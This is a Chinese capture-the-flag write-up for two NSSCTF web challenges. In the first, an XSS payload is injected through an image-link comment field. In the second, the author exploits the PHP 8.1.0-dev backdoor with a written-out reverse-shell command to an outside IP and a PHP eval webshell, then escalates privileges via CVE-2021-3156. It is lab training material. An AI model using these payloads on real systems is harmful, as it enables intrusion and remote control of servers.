【Web】NSSCTF Round#18 Basic个人wp(部分)

目录

①门酱想玩什么呢?

②Becomeroot


①门酱想玩什么呢?

先试一下随便给个链接

不能访问远程链接,结合评论区功能,不难联想到xss,只要给个评论区链接让门酱访问就可

我们研究下评论区

从评论区知道,要让门酱玩元梦之星,考虑直接

<script>document.location="https://ymzx.qq.com/";</script>

尝试传了发现不能起作用跳转,估计是<>这些被html实体化了

那咋整呢,题目里还提供了评论插入图片功能

我们就按示例传一下(必须以http://开头,否则不能解析为图片)

链接是插入到了src中,我们可以直接用">闭合img标签

评论传

复制代码
http://"><script>document.location="https://ymzx.qq.com/";</script>.png 123 /png

成功重定向到元梦之星官网

bp抓包

获得该条恶意评论链接

复制代码
http://node1.anna.nssctf.cn:28834/words/?title=MQ%3D%3D&content=aHR0cCUzQSUyRiUyRiUyMiUzRSUzQ3NjcmlwdCUzRWRvY3VtZW50LmxvY2F0aW9uJTNEJTIyaHR0cHMlM0ElMkYlMkZ5bXp4LnFxLmNvbSUyRiUyMiUzQiUzQyUyRnNjcmlwdCUzRS5wbmclMjAxMjMlMjAlMkZwbmc%3D

把这个链接给门酱即可获得flag

②Becomeroot

进来直接告诉我们php版本是8.1.0-dev

PHP-8.1.0-dev 后门命令执行漏洞复现_php/8.1.0-dev-CSDN博客

复制代码
User-Agentt: zerodiumsystem("bash -c 'exec bash -i >& /dev/tcp/124.222.136.33/1337 0>&1'");

直接反弹shell,发现要提权

GitHub - Rvn0xsy/CVE-2021-3156-plus: CVE-2021-3156非交互式执行命令

脚本不太好整到靶机上,还是写马连webshell方便点

复制代码
User-Agentt: zerodiumsystem("echo '<?php eval(\$_POST[1])?>'>/var/www/html/1.php");

尝试用suid提权插件来整,失败

GitHub - Rvn0xsy/CVE-2021-3156-plus: CVE-2021-3156非交互式执行命令 脚本传到服务器

提权执行命令(环境没了,借了别的师傅的图)

相关推荐
mooyuan天天2 小时前
DVWA靶场通关笔记-文件上传(Medium级别)
web安全·文件上传·文件上传漏洞·dvwa靶场·文件上传mime
速盾cdn6 小时前
速盾:高防CDN还有哪些冷知识?
网络·web安全
m0_7381207211 小时前
玄机——某学校系统中挖矿病毒应急排查
网络·安全·web安全
浩浩测试一下10 天前
渗透测试指南(CS&&MSF):Windows 与 Linux 系统中的日志与文件痕迹清理
linux·运维·windows·安全·web安全·网络安全·系统安全
安全系统学习10 天前
【网络安全】DNS 域原理、危害及防御
算法·安全·web安全·网络安全·哈希算法
我看就这样吧10 天前
内网提权-脏牛提权(Metasploitable2)
web安全
ALe要立志成为web糕手10 天前
Kubernetes安全
安全·web安全·网络安全·k8s·云安全
mooyuan天天10 天前
pikachu靶场通关笔记44 SSRF关卡02-file_get_content(三种方法渗透)
网络·安全·web安全·ssrf·ssrf漏洞
mooyuan天天10 天前
pikachu靶场通关笔记43 SSRF关卡01-CURL(三种方法渗透)
笔记·安全·web安全·ssrf漏洞
鹿鸣天涯10 天前
网络安全应急响应实战笔记
安全·web安全